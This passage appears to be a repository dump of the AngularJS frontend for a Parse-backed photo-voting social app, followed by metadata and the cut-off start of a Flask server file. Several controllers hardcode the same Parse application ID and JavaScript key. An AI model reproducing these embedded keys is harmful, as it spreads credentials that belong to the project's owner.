{\n\t\t$scope.width=\"70%\"\n\t}\n\n\t$scope.posts = new Array()\n\t$scope.PostsVisibility = true\n\t$scope.$watch(function(){return Model.Value},function(){\n\t\tif(Model.Value != null && Model.Value!='undefined'){\n\t\tvar SearchPromise = Search.SearchAccordingToKeyWord(Model.Value)\n\t\tSearchPromise.then(function(SearchResults){\n\t\t\t$scope.posts = SearchResults\n\t\t})\n\t}\n\telse {\n\t\t$scope.Posts = $scope.backup\n\t}\n\t},true)\n\ttry {\n\t\tvar spinner = document.getElementById('spinner')\n\t\tspinner.style.display = 'block'\n\t\tvar LoadMore = document.getElementById('LoadMore')\n\t\tLoadMore.style.display = 'none'\n\n\t} catch (e) {\n\n\t} finally {\n\n\t}\nvar promise = PostService.GetPosts([])\npromise.then(\nfunction(Data){\n\t$scope.posts = Data\n\t$scope.backup = $scope.posts\n\t$scope.PostsVisibility = false;\n\t\t\ttry {\n\t\t\t\tvar spinner = document.getElementById('spinner')\n\t\t\t\tspinner.style.display = 'none'\n\t\t\t\t\t\t\t\t\t // LoadMore\n\t\t\t\tvar LoadMore = document.getElementById('LoadMore')\n\t\t\t\tLoadMore.style.display = 'block'\n\t\t\t} catch (e) {\n\t\t\t\t// console.log(e);\n\t\t\t} finally {\n\n\t\t\t}\t\t\t //spinner\n},function(reason){\n //console.log(reason);\n},function (update) {\n //console.log(\"Update\");\n $scope.posts = update\n});\n\n\t$scope.openComment = function(index) {\n\t\t// console.log(\"df\");\n\t\t$('#modal1').openModal();\n\t\tGetComments($scope.posts[index].id)\n\n\t}\n\t$scope.LoadMore = function () {\n\t\t// console.log(\"clicked\");\n\t\t//spinner\n\t\tvar spinner = document.getElementById('spinner')\n\t\tspinner.style.display = 'block'\n\t\t// LoadMore\n\t\tvar LoadMore = document.getElementById('LoadMore')\n\t\tLoadMore.style.display = 'none'\n\t\tvar promise = 
PostService.GetPosts($scope.posts)\n\t\tpromise.then(function(Data){\n\t\t\t// console.log(Data)\n\t\t LoadMore = document.getElementById('LoadMore')\n\t\t\tLoadMore.style.display = 'block'\n\t\t\tspinner.style.display = \"none\"\n\t\t})\n\t}\n\t$scope.Punch = function(index,which){\n\t\t\tvar current_user = Parse.User.current()\n\t\t\tvar objectId = $scope.posts[index].id;\n\n\t\t\t\t\tParse.Cloud.run(\"TapTap\", {which:which,userObjID:current_user.id,objectId:objectId},{\n\t\t\t\t\t\tsuccess:function(response) {\n\t\t\t\t\t\t\t// console.log(JSON.stringify(response));\n if(which==1)\n {\n response.set('isVoted1',\"block\")\n response.set(\"isVoted2\",\"none\")\n }else {\n response.set('isVoted2',\"block\")\n response.set(\"isVoted1\",\"none\")\n }\n\n\t\t\t\t\t\t\t$scope.posts[index] = response\n\t\t\t\t\t\t\t$scope.$apply()\n\t\t\t\t\t\t},\n\t\t\t\t\t\terror : function(error) {\n\t\t\t\t\t\t\t// console.log(error);\n\t\t\t\t\t\t}\n\t\t\t\t\t})\n\t\t}\n\n$scope.PostComment=function(){\n\tvar objectId = $scope.objectId\n\tvar CommentObj = Parse.Object.extend(\"Comment\")\n\tvar Comment = new CommentObj();\n\tvar Post = {\n\t__type: 'Pointer',\n\tclassName: 'Posts',\n\tobjectId: objectId\n\t}\n\tComment.set(\"User\",Parse.User.current())\n\tComment.set(\"Post\",Post)\n\tComment.set(\"comment\",$scope.cc)\n\tif($scope.cc != null && $scope.cc !=\"undefined\")\n\t{\n\tComment.save()\n\t$scope.comments.push(Comment)\n\t$scope.cc = null\n\t// $scope.$apply();\n\tMaterialize.toast('Comment Added successfully', 4000)\n\t}\n\telse {\n\t\tMaterialize.toast('Comment cannot be null', 4000)\n\t}\n}\n\nfunction GetComments(objectId)\n{\n\t\t\t$scope.objectId = objectId\n\t\t\tvar Comment = Parse.Object.extend(\"Comment\")\n\t\t\tvar CommentQuery = new Parse.Query(Comment);\n\t\t\tvar Post = {\n\t\t\t__type: 'Pointer',\n\t\t\tclassName: 'Posts',\n\t\t\tobjectId: objectId\n\t\t\t}\n\t\t\tCommentQuery.equalTo(\"Post\",Post)\n\t\t\tCommentQuery.find({\n\t\t\t\tsuccess : function (Comments) {\n\t\t\t\t\t\tfor(var i=0;i<Comments.length;i++)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tvar User = Comments[i].get(\"User\",Parse.User.current())\n\t\t\t\t\t\t\tUser.fetch()\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif(Comments.length == 0)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t$scope.youFirst = true\n\t\t\t\t\t\t}\n\t\t\t\t\t\telse\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t$scope.youFirst = false\n\t\t\t\t\t\t}\n\t\t\t\t\t\t$scope.comments = Comments\n\t\t\t\t\t\t$scope.$apply()\n\t\t\t\t},\n\t\t\t\terror : function (error) {\n\t\t\t\t\t// console.log(error);\n\t\t\t\t}\n\t\t\t})\n}\n\nfunction detectmob() {\n if( navigator.userAgent.match(/Android/i)\n || navigator.userAgent.match(/webOS/i)\n || navigator.userAgent.match(/iPhone/i)\n || navigator.userAgent.match(/iPad/i)\n || navigator.userAgent.match(/iPod/i)\n || navigator.userAgent.match(/BlackBerry/i)\n || navigator.userAgent.match(/Windows Phone/i)\n ){\n return true;\n }\n else {\n return false;\n }\n}\n\n\n})\n\n\napp.controller(\"CreatePunch\",function($scope,$filter){\n $scope.validLength = 50;\n $scope.validTitleLength = 20;\n var intrestQuery = new Parse.Query('Intrestlist')\n intrestQuery.find({\n success:function(Interests){\n //console.log(Interests);\n var list = [];\n for(var i=0;i<Interests.length;i++)\n {\n list.push(Interests[i].get('IntrestText'))\n }\n $scope.Interests = list;\n }\n })\n\t$scope.punchit = function(){\n\t\t\t\tvar wait = document.getElementById(\"wait\")\n\t\t\t\tvar PunchModel = document.getElementById(\"PunchModel\")\n\n var InterestsArray = []\n var cboxes = 
$('.Interests');\n var len = cboxes.length;\n //console.log(cboxes);\n var InterestsArray = [];\n $.each($(\"input[class='Interests']:checked\"), function(){\n InterestsArray.push($(this).val());\n });\n\n\n\t\t\t\tvar Title = $scope.Title;\n\t\t\t\tvar Image1 = $('#Image1')[0]; //File1\n\t\t\t\tvar Image2 = $('#Image2')[0]; //File2\n\t\t\t\tvar Image1Title = $scope.Image1Title;\n\t\t\t\tvar Image2Title = $scope.Image2Title;\n\t\t\t\tParse.initialize(\"Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4\", \"fR1P17QhE9b7PKOa1wXozi0yo8IAlYLSIzqYh4EU\");\n\t\t\t\tvar current_user = Parse.User.current()\n\t\t\t\tvar Image1File,Image2File;\n\t\t\t\tvar PostObject = Parse.Object.extend('Posts')\n\t\t\t\tvar Post = new PostObject();\n\t\t\t\tvar Communites = $scope.Communites\n // console.log(InterestsArray);\n // alert(Image1.files[0].size / 1000000)\n\tif(Image1.files[0].size / 1000000 > 5 || Image2.files[0] / 1000000 > 5)\n {\n var $toastContent = $('<span>File size cannot be larger than 3 mbs</span>');\n\t\t\t\t\tMaterialize.toast($toastContent, 5000);\n }\n else if(Image1.files.length > 0 && Image2.files.length > 0 && Image1Title != null && Image2Title != null && InterestsArray.length > 0 && Title != null)\n\t\t\t\t{\n wait.style.display = \"block\"\n\t Image1File = new Parse.File(\"Image1.png\",Image1.files[0])\n\t Image2File = new Parse.File(\"Image2.png\",Image2.files[0])\n var quality = 20\n // output file format (jpg || png)\n output_format = 'jpg'\n //This function returns an Image Object\n //console.log(Image1.files[0]);\n // console.log($('#Preview1').attr('src'));\n var image = new Image();\n image.src = $('#Preview1').attr('src');\n\n var image1 = new Image();\n image1.src = $('#Preview2').attr('src');\n\n var target_img = jic.compress(image,quality,output_format).src;\n var target_img1 = jic.compress(image1,quality,output_format).src;\n console.log(target_img1);\n Image1File = new Parse.File(\"Image1\",{base64:target_img})\n Image2File = new Parse.File(\"Image2\",{base64:target_img1})\n // console.log({base64:target_img});\n\t\t\t\t\t\tPost.set(\"Title\",Title);\n\t\t\t\t\t\tPost.set(\"Image1\",Image1File);\n\t\t\t\t\t\tPost.set(\"Image2\",Image2File);\n\t\t\t\t\t\tPost.set(\"By\",current_user);\n\t\t\t\t\t\tPost.set(\"Image1Title\",Image1Title);\n\t\t\t\t\t\tPost.set(\"Image2Title\",Image2Title);\n\t\t\t\t\t\tPost.set(\"Punchers1\",new Array())\n\t\t\t\t\t\tPost.set(\"Punchers2\",new Array())\n\t\t\t\t\t\t// var InterestsArray = Communites.split(\",\");\n\t\t\t\t\t\tPost.set(\"TargetIntrests\",InterestsArray);\n\t\t\t\t\t\tPost.save(null,{\n\t\t\t\t\t\t\tsuccess : function (Post) {\n\t\t\t\t\t\t\t\t\t\t$('#PunchModel').closeModal();\n\t\t\t\t\t\t\t\t\t\tvar $toastContent = $('<span> Posted successfully</span>');\n\t\t\t\t\t\t\t\t\t\tMaterialize.toast($toastContent, 5000);\n $('#CreatePunch').load(document.URL + ' #CreatePunch');\n location.reload();\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\terror: function (error) {\n\t\t\t\t\t\t\t\tvar $toastContent = $('<span>'+String(error)+'</span>');\n\t\t\t\t\t\t\t\tMaterialize.toast($toastContent, 5000);\n wait.style.display = \"none\"\n location.reload();\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t});\n }\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tvar $toastContent = $('<span>Please check and fill all the fields</span>');\n\t\t\t\t\tMaterialize.toast($toastContent, 5000);\n\t\t\t\t}\n }\n\t\t\t// }\n});\n\nfunction uniq(a) {\n return a.sort().filter(function(item, pos, ary) {\n return !pos || item != ary[pos - 1];\n 
})\n}\n\n\napp.controller('DetailsController',function($scope,$http,Data) {\n\n\n\nfunction detectmob() {\n\t if( navigator.userAgent.match(/Android/i)\n\t || navigator.userAgent.match(/webOS/i)\n\t || navigator.userAgent.match(/iPhone/i)\n\t || navigator.userAgent.match(/iPad/i)\n\t || navigator.userAgent.match(/iPod/i)\n\t || navigator.userAgent.match(/BlackBerry/i)\n\t || navigator.userAgent.match(/Windows Phone/i)\n ){\n\t\t\treturn true;\n\t\t}\n\t else {\n\t\t\treturn false;\n\t\t}\n\t}\n\n\tif(!detectmob())\n\t{\n\t\t$scope.width = \"100%\";\n\t\t$scope.blur_img = \"width:90%;margin-left:6%;margin-top:-10px; height:480px\";\n\t\t$scope.dp = \"width:15%\";\n\t\t$scope.follow_div = \"right:170px;height:30px; width:100px;margin-top:-110px;float:right\";\n\t\t$scope.color = \"red\"\n\t\t$scope.ffp_full = \"width:90%;margin-left:6%;margin-top:2%;\";\n\t\t$scope.follower = \"width:50px; height:10px; padding-top:2px\";\n\t\t$scope.divider1 = \"width:2px;margin-top:10px; height:70px\";\n\t\t$scope.following = \"null\";\n\t\t$scope.divider2 = \"width:2px;margin-top:10px; height:70px\";\n\t}\n\telse {\n\t\t$scope.width=\"70%\"\n\t\t$scope.blur_img = \"width:100%;margin-left:6%;margin-top:-10px; height:480px\";\n\t\t$scope.dp = \"width:20%\";\n\t\t$scope.follow_div = \"margin-left:35%;height:30px;float:left;\";\n\t\t$scope.color = \"red\"\n\t\t$scope.ffp_full = \"width:100%;margin-left:5%;\";\n\t\t$scope.follower = \"\";\n\t\t$scope.divider1 = \"width:2px;margin-top:10px; height:70px;\";\n\t\t$scope.following = \"\";\n\t\t$scope.divider2 = \"width:2px;margin-top:10px; height:70px;\";\n\t}\n\n\n\tvar params = {};\n\tvar User = null;\n\tif (location.search) {\n\t\t\tvar parts = location.search.substring(1).split('&');\n\n\t\t\tfor (var i = 0; i < parts.length; i++) {\n\t\t\t\t\tvar nv = parts[i].split('=');\n\t\t\t\t\tif (!nv[0]) continue;\n\t\t\t\t\tparams[nv[0]] = nv[1] || true;\n\t\t\t}\n\t}\n\tvar objectId = params.id\n\tif(objectId == Parse.User.current().id || objectId == null)\n\t{\n\tUser = Parse.User.current()\n\t$scope.Name = Parse.User.current().get(\"Name\")\n\t$scope.Ninja_name = Parse.User.current().get(\"Ninja_name\")\n\t$scope.ProfilePicture = Parse.User.current().get(\"ProfilePicture\").url()\n\tvar Follow = document.getElementById('Follow')\n\t$scope.display = 'none'\n\t}\n\telse {\n\t\tUser = new Parse.User();\n\t\tUser.id = objectId\n\t\tUser.fetch({\n\t\t\tsuccess : function (usr) {\n\t\t\t\t// console.log(\"----Name ==\" + usr.get(\"Name\"))\n\t\t\t\t$scope.Name = User.get(\"Name\")\n\t\t\t\t$scope.Ninja_name = User.get(\"Ninja_name\")\n\t\t\t\t$scope.ProfilePicture = User.get(\"ProfilePicture\").url()\n\t\t\t}\n\t\t})\n\t\tCheckIfIamFollowing()\n\t\t$scope.display = 'block'\n\t}\n\n\t// $(\"#ProfilePicture\").load(function() {\n\t// \tvar img = document.getElementById('ProfilePicture')\n\t// \txi=new XMLHttpRequest();\n\t// \txi.open(\"GET\",img.src,true);\n\t// \txi.send();\n\t//\n\t// xi.onreadystatechange=function() {\n\t// if(xi.readyState==4 && xi.status==200) {\n\t// img=new Image;\n\t// img.onload=function(){\n\t//\n\t// }\n\t// img.src=xi.responseText;\n\t// }\n\t// }\n\t// })\n\n\n\t$scope.isFollowing = \"Please wait ..\"\n\tGetFollowers()\n\tGetFollowing()\n\t$scope.Data = Data\n\tfunction GetFollowers()\n\t{\n\t$scope.Posts = Data.Value\n\tvar FollowObject = Parse.Object.extend(\"FollowList\")\n\tvar GetFollowersQuery = new Parse.Query(FollowObject)\n\tGetFollowersQuery.equalTo(\"Following\",User)\n\tGetFollowersQuery.find({\n\t\tsuccess : function (Followers) 
{\n\t\t\t// console.log(Followers.length);\n\t\t\t$scope.Followers = Followers.length\n\t\t\t$scope.$apply()\n\t\t}\n\t})\n\t}\n\tfunction GetFollowing()\n\t{\n\tvar FollowObject = Parse.Object.extend(\"FollowList\")\n\tvar GetFollowingQuery = new Parse.Query(FollowObject)\n\tGetFollowingQuery.equalTo(\"Follower\",User)\n\tGetFollowingQuery.find({\n\t\tsuccess : function (Following) {\n\t\t\tconsole.log(Following.length);\n\t\t\t$scope.Following = Following.length\n\t\t\t$scope.$apply()\n\t\t}\n\t})\n\t}\n\n\t$scope.FollowUnfollowAction = function()\n\t{\n\t\tvar FollowType = Parse.Object.extend(\"FollowList\")\n\t\tvar FollowObject = new FollowType();\n\t\tFollowObject.set(\"Follower\",Parse.User.current())\n\t\tFollowObject.set(\"Following\",User)\n\t\tFollowObject.set(\"FollowingName\",User.get(\"Name\"))\n\t\tif($scope.isFollowing == \"Follow\")\n\t\t{\n\t\t\tFollowObject.save({success : function(Object) {\n\t\t\t\t$scope.objectIdOfFollowObject = Object.id\n\t\t\t}})\n\t\t\t$scope.isFollowing = \"Unfollow\"\n\t\t\t$scope.icon = \"Follwing\"\n\t\t\t$scope.Followers += 1\n\t\t}\n\t\telse {\n\t\t\tFollowObject = new FollowType();\n\t\t\tvar Query = new Parse.Query(FollowType);\n\t\t\tQuery.equalTo(\"objectId\",$scope.objectIdOfFollowObject)\n\t\t\tQuery.find({\n\t\t\t\tsuccess:function(Objects) {\n\t\t\t\t\tObjects[0].destroy()\n\t\t\t\t}\n\t\t\t})\n\n\t\t\t$scope.isFollowing = \"Follow\"\n\t\t\t$scope.icon = \"+Follow\"\n\t\t\t$scope.Followers -= 1\n\t\t}\n\t}\n\nfunction CheckIfIamFollowing()\n{\n\tvar FollowObject = Parse.Object.extend(\"FollowList\")\n\tvar GetFollowingQuery = new Parse.Query(FollowObject)\n\tGetFollowingQuery.equalTo(\"Follower\",Parse.User.current())\n\tGetFollowingQuery.find({\n\t\tsuccess : function (Following) {\n\t\t\tif(Following.length == 0)\n\t\t\t{\n\t\t\t\t$scope.isFollowing = \"Follow\"\n\t\t\t\t$scope.icon = \"+Follow\"\n\t\t\t}\n\t\t\tfor(var i=0;i<Following.length;i++)\n\t\t\t{\n\t\t\t\t// Unfollow : remove\n\t\t\t\t// Follow : person_add\n\t\t\t\t// console.log(\"Follower = \" + Following[i].get(\"Follower\").id + \"Following =\" + Following[i].get(\"Following\").id);\n\t\t\t\tif(Following[i].get(\"Follower\").id == Parse.User.current().id && Following[i].get(\"Following\").id == User.id)\n\t\t\t\t{\n\t\t\t\t\t// console.log(\"Yahh is Following\");\n\t\t\t\t\t$scope.isFollowing = \"UnFollow\";\n\t\t\t\t\t$scope.icon = \"-UnFollow\"\n\t\t\t\t\t$scope.objectIdOfFollowObject = Following[i].id;\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\t$scope.isFollowing = \"Follow\"\n\t\t\t\t\t$scope.icon = \"+Follow\"\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t})\n}\n\n})\n\napp.controller('UserPunchesController',function($scope,$http,Data) {\n\n\tfunction detectmob() {\n\t if( navigator.userAgent.match(/Android/i)\n\t || navigator.userAgent.match(/webOS/i)\n\t || navigator.userAgent.match(/iPhone/i)\n\t || navigator.userAgent.match(/iPad/i)\n\t || navigator.userAgent.match(/iPod/i)\n\t || navigator.userAgent.match(/BlackBerry/i)\n\t || navigator.userAgent.match(/Windows Phone/i)\n\t ){\n\t return true;\n\t }\n\t else {\n\t return false;\n\t }\n\n\t}\n\n\tif(detectmob())\n\t{\n\t\t$scope.width = \"100%\";\n\t}\n\telse {\n\t\t$scope.width=\"70%\"\n\t\t$scope.pcmargin = \"16%\"\n\t}\n\n\n\tvar params = {};\n\tvar User = null\n\tif (location.search) {\n\t var parts = location.search.substring(1).split('&');\n\n\t for (var i = 0; i < parts.length; i++) {\n\t var nv = parts[i].split('=');\n\t if (!nv[0]) continue;\n\t params[nv[0]] = nv[1] || true;\n\t }\n\t}\n\tvar objectId = 
params.id\n\tif(objectId == Parse.User.current() || objectId == null)\n\t{\n\t\tUser = Parse.User.current();\n\t}\n\telse {\n\t\tUser = new Parse.User();\n\t\tUser.id = objectId\n\t\tUser.fetch()\n\t}\n\n\t$scope.posts = new Array()\n\t$scope.PostsVisibility = true\n\t$scope.openComment = function(index) {\n\t\t// console.log(\"df\");\n\t\t$('#modal1').openModal();\n\t\tGetComments($scope.posts[index].id)\n\n\t}\n\t$scope.LoadMore = function () {\n\t\t// console.log(\"clicked\");\n\t\t// spinner\n\t\tvar spinner = document.getElementById('spinner')\n\t\tspinner.style.display = 'block'\n\t\tGetPosts()\n\t}\n\n\tParse.initialize(\"Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4\", \"fR1P17QhE9b7PKOa1wXozi0yo8IAlYLSIzqYh4EU\");\n\t$http.get('/GetSessionToken')\n\t.then(function(response) {\n\t\t// console.log(response.data);\n\tParse.User.become(response.data)\n\tGetPosts()\n\t})\n\n\t$scope.Punch = function(index,which){\n\t\t\tvar current_user = Parse.User.current()\n\t\t\tvar objectId = $scope.posts[index].id;\n\n\t\t\t\t\tParse.Cloud.run(\"TapTap\", {which:which,userObjID:current_user.id,objectId:objectId},{\n\t\t\t\t\t\tsuccess:function(response) {\n\t\t\t\t\t\t\t// console.log(JSON.stringify(response));\n\t\t\t\t\t\t\t$scope.posts[index] = response\n\t\t\t\t\t\t\t$scope.$apply()\n\t\t\t\t\t\t},\n\t\t\t\t\t\terror : function(error) {\n\t\t\t\t\t\t\t// console.log(error);\n\t\t\t\t\t\t}\n\t\t\t\t\t})\n\t\t}\n\nfunction GetPosts(hashTag)\n{\n\t\tvar posts = Parse.Object.extend(\"Posts\")\n\t\tvar Query = new Parse.Query(posts)\n\n\n\t\tQuery.equalTo(\"By\",User)\n\n\t\tif($scope.posts.length > 0){\n\t\t\t// console.log(\"load more\");\n\t\t\tvar ExistingObjectIds=new Array();\n\t\t\tfor(var i=0;i<$scope.posts.length;i++)\n\t\t\t{\n\t\t\t\t// console.log($scope.posts[i].id);\n\t\t\t\tExistingObjectIds[i] = $scope.posts[i].id;\n\t\t\t}\n\t\t\t// console.log(ExistingObjectIds);\n\t\t\tQuery.notContainedIn(\"objectId\",ExistingObjectIds)\n\t\t}\n\t\tQuery.descending(\"createdAt\")\n\t\tQuery.find({\n\t\t\tsuccess : function (data) {\n\t\t\t\t\tData.Value = data.length\n\t\t\t\t\tif(data !=null && data != 'undefined'){\n\t\t\t\t\t\t// $scope.posts=data\n\t\t\t\t\t\t// console.log(typeof($scope.post));\n\t\t\t\t\t\tfor(var i=0;i<data.length;i++)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tvar SinglePost = data[i];\n\t\t\t\t\t\t\t// console.log(JSON.stringify(SinglePost));\n\t\t\t\t\t\t\tSinglePost.Image1Title = SinglePost.get(\"Image1Title\")\n\t\t\t\t\t\t\tSinglePost.Image2Title = SinglePost.get(\"Image2Title\")\n var createdAt = SinglePost.get('createdAt')\n\t\t\t\t\t\t\tvar timeStamp = GetTimeStamp(createdAt)\n\t\t\t\t\t\t\tSinglePost.set('TimeStamp',timeStamp);\n\t\t\t\t\t\t\tSinglePost.set(\"Votes1\",SinglePost.get('Punchers1').length)\n\t\t\t\t\t\t\tSinglePost.set(\"Votes2\",SinglePost.get('Punchers2').length)\n\n\t\t\t\t\t\t\tvar user = SinglePost.get('By')\n\t\t\t\t\t\t\tuser.fetch({\n\t\t\t\t\t\t\t\tsuccess:function(myObject) {\n\t\t\t\t\t\t\t\t\tconsole.log(JSON.stringify(myObject));\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t});\n if(SinglePost.get('Votes1') > 0 || SinglePost.get('Votes2') > 0)\n {\n if(SinglePost.get('Punchers1').indexOf(Parse.User.current().id) > -1)\n {\n SinglePost.set('isVoted1',\"block\")\n SinglePost.set('isVoted2',\"none\")\n // alert(SinglePost.Image1Title + SinglePost.Image2Title + \" = isVoted1 = \" + SinglePost.get('isVoted1') + \" isVoted2 = \" + SinglePost.get('isVoted2'));\n }\n\n else if(SinglePost.get('Punchers2').indexOf(Parse.User.current().id) > -1)\n {\n 
SinglePost.set('isVoted1',\"none\")\n SinglePost.set('isVoted2',\"block\")\n // alert(SinglePost.Image1Title + SinglePost.Image2Title + \" = isVoted1 = \" + SinglePost.get('isVoted1') + \" isVoted2 = \" + SinglePost.get('isVoted2'));\n }\n else {\n SinglePost.set('isVoted1',\"none\")\n SinglePost.set('isVoted2',\"none\")\n }\n }\n else {\n SinglePost.set('isVoted1',\"none\")\n SinglePost.set('isVoted2',\"none\")\n }\n\t\t\t\t\t\t\t$scope.posts.push(SinglePost)\n\t\t\t\t\t\t}\n\t\t\t\t\t\t$scope.PostsVisibility = false;\n\t\t\t\t\t\t//spinner\n\t\t\t\t\t\tvar spinner = document.getElementById('spinner')\n\t\t\t\t\t\tspinner.style.display = 'none'\n\t\t\t\t\t\t$scope.$apply()\n\t\t\t\t\t\t// console.log($scope.posts.length);\n\t\t\t\t\t}\n\t\t\t\t\telse {\n\t\t\t\t\t\t// console.log(\"null\");\n\t\t\t\t\t}\n\t\t\t},\n\t\t\terror : function (error) {\n\t\t\t\t// console.log(error);\n\t\t\t}\n\t\t})\n}\n\nfunction GetTimeStamp(createdAt)\n{\n\tvar currentDate = new Date()\n\tvar Time;\n\tif(Math.abs(currentDate.getMonth() - createdAt.getMonth()) == 0)\n\t{\n\t\tif(Math.abs(currentDate.getDay() - createdAt.getDay()) > 7)\n\t\t{\n\t\t\tTime = String(parseInt(Math.abs(currentDate.getDay() - createdAt.getDay())) / 7 ) + \"W\"\n\t\t}\n\t\telse if (Math.abs(currentDate.getDay() - createdAt.getDay()) > 0)\n\t\t{\n\t\t\tTime = String(Math.abs(currentDate.getDay() - createdAt.getDay())) + \"d\"\n\t\t}\n\t\telse if (Math.abs(currentDate.getHours() - createdAt.getHours()) > 0){\n\t\t\tTime = String(Math.abs(currentDate.getHours() - createdAt.getHours())) + \"h\"\n\t\t}\n\t\telse {\n\t\t{\n\t\t\t\t\tTime = String(Math.abs(currentDate.getMinutes() - createdAt.getMinutes())) + 'm'\n\t\t}\n\t\t}\n\t}\n\telse {\n\t\tTime = String(Math.abs(currentDate.getMonth() - createdAt.getMonth())) + 'M'\n\t}\n\treturn Time;\n}\n\n$scope.PostComment=function(){\n\tvar objectId = $scope.objectId\n\tvar CommentObj = Parse.Object.extend(\"Comment\")\n\tvar Comment = new CommentObj();\n\tvar Post = {\n\t__type: 'Pointer',\n\tclassName: 'Posts',\n\tobjectId: objectId\n\t}\n\tComment.set(\"User\",Parse.User.current())\n\tComment.set(\"Post\",Post)\n\tComment.set(\"comment\",$scope.cc)\n\tif($scope.cc != null && $scope.cc !=\"undefined\")\n\t{\n\tComment.save()\n\t$scope.comments.push(Comment)\n\t$scope.cc = null\n\t$scope.$apply();\n\tMaterialize.toast('Comment Added successfully', 4000)\n\t}\n\telse {\n\t\tMaterialize.toast('Comment cannot be null', 4000)\n\t}\n}\n\nfunction GetComments(objectId)\n{\n\t\t\t$scope.objectId = objectId\n\t\t\tvar Comment = Parse.Object.extend(\"Comment\")\n\t\t\tvar CommentQuery = new Parse.Query(Comment);\n\t\t\tvar Post = {\n\t\t\t__type: 'Pointer',\n\t\t\tclassName: 'Posts',\n\t\t\tobjectId: objectId\n\t\t\t}\n\t\t\tCommentQuery.equalTo(\"Post\",Post)\n\t\t\tCommentQuery.find({\n\t\t\t\tsuccess : function (Comments) {\n\t\t\t\t\t\tfor(var i=0;i<Comments.length;i++)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tvar User = Comments[i].get(\"User\",Parse.User.current())\n\t\t\t\t\t\t\tUser.fetch()\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif(Comments.length < 0)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t$scope.youFirst = false\n\t\t\t\t\t\t}\n\t\t\t\t\t\telse\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t$scope.youFirst = true\n\t\t\t\t\t\t}\n\t\t\t\t\t\t$scope.comments = Comments\n\t\t\t\t\t\t$scope.$apply()\n\t\t\t\t},\n\t\t\t\terror : function (error) {\n\t\t\t\t\t// console.log(error);\n\t\t\t\t}\n\t\t\t})\n}\n\nfunction detectmob() {\n if( navigator.userAgent.match(/Android/i)\n || navigator.userAgent.match(/webOS/i)\n || 
navigator.userAgent.match(/iPhone/i)\n || navigator.userAgent.match(/iPad/i)\n || navigator.userAgent.match(/iPod/i)\n || navigator.userAgent.match(/BlackBerry/i)\n || navigator.userAgent.match(/Windows Phone/i)\n ){\n return true;\n }\n else {\n return false;\n }\n}\n})\n\napp.controller('share',['$scope','PostService','Time',function($scope,PostService,Time) {\n init();\n function init()\n {\n \tif(location.href.split('/').indexOf(\"share\") != -1)\n {\n var objectId = location.href.split('/')[location.href.split('/').indexOf(\"share\") + 1]\n //console.log(objectId)\n //console.log(objectId);\n Parse.initialize(\"Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4\", \"fR1P17QhE9b7PKOa1wXozi0yo8IAlYLSIzqYh4EU\");\n var posts = Parse.Object.extend(\"Posts\")\n var Query = new Parse.Query(posts)\n Query.equalTo(\"objectId\",objectId)\n Query.include(\"_User\")\n Query.descending(\"createdAt\")\n Query.limit(5);\n Query.find({\n success : function (data) {\n if(data !=null && data != 'undefined')\n {\n for(var i=0;i<data.length;i++)\n {\n var SinglePost = data[i];\n SinglePost.Image1Title = SinglePost.get(\"Image1Title\")\n SinglePost.Image2Title = SinglePost.get(\"Image2Title\")\n var user = SinglePost.get('By')\n user.fetch({\n success:function(myObject) {\n var createdAt = SinglePost.get('createdAt')\n var timeStamp = Time.GetTimeStamp(createdAt)\n SinglePost.set('TimeStamp',timeStamp);\n SinglePost.set(\"Votes1\",SinglePost.get('Punchers1').length)\n SinglePost.set(\"Votes2\",SinglePost.get('Punchers2').length)\n $scope.SinglePost = SinglePost\n //console.log($scope.SinglePost)\n $scope.$apply()\n }\n });\n\n }\n\n }\n },\n error : function (error) {\n \n }\n })\n }\n //}\n }\n}]);\n\napp.directive('myEnter', function () {\n return function (scope, element, attrs) {\n element.bind(\"keydown keypress\", function (event) {\n if(event.which === 13) {\n scope.$apply(function (){\n scope.$eval(attrs.myEnter);\n });\n\n event.preventDefault();\n }\n });\n };\n});\n\napp.directive('wmBlock', function ($parse) {\n return {\n scope: {\n wmBlockLength: '='\n },\n link: function (scope, elm, attrs) {\n\n elm.bind('keypress', function(e){\n\n if(elm[0].value.length > scope.wmBlockLength){\n e.preventDefault();\n return false;\n }\n });\n }\n }\n});\n\napp.config(['$interpolateProvider', function($interpolateProvider) {\n $interpolateProvider.startSymbol('{a');\n $interpolateProvider.endSymbol('a}');\n}])\n" }, { "alpha_fraction": 0.682009756565094, "alphanum_fraction": 0.6914516687393188, "avg_line_length": 27.37799072265625, "blob_id": "bbd5774b2cea381c06eb92f5e673f2ee4c8b5592", "content_id": "d94be2f9bf013010d76b485f73f5c444ddaa1458", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5931, "license_type": "no_license", "max_line_length": 108, "num_lines": 209, "path": "/hello.py", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "from parse_rest.user import User\nimport settings_local\nfrom flask import Flask,request,redirect, url_for ,render_template,send_from_directory,session,make_response\nfrom parse_rest.connection import SessionToken, register\nfrom parse_rest.datatypes import Function\nimport json,httplib\nimport os\nfrom flask.ext.triangle import Form,Triangle\nfrom flask.ext.triangle.widgets.standard import TextInput\nfrom datetime import timedelta\nfrom flask import session, app\nimport os\nimport pusher\nimport getPost\nfrom flask import Blueprint\n\nsettings_local.initParse()\napp = 
